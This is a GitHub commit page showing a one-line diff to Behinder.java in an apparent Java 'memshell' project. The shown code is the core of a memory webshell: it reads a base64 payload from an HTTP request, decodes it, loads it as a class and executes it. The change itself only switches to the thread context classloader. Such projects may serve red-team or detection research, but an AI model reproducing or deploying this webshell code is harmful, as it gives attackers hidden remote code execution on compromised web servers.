We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 9b3f57f commit 397e55eCopy full SHA for 397e55e
memshell/src/main/java/com/reajason/javaweb/memshell/shelltool/behinder/Behinder.java
@@ -46,7 +46,7 @@ public boolean equals(Object obj) {
46
map.put("session", session);
47
String parameter = ((BufferedReader) invokeInternalMethod(request, "getReader")).readLine();
48
byte[] bytes = x(base64Decode(parameter));
49
- Object instance = (new Behinder(this.getClass().getClassLoader())).g(bytes).newInstance();
+ Object instance = (new Behinder(Thread.currentThread().getContextClassLoader())).g(bytes).newInstance();
50
instance.equals(map);
51
return true;
52
}
0 commit comments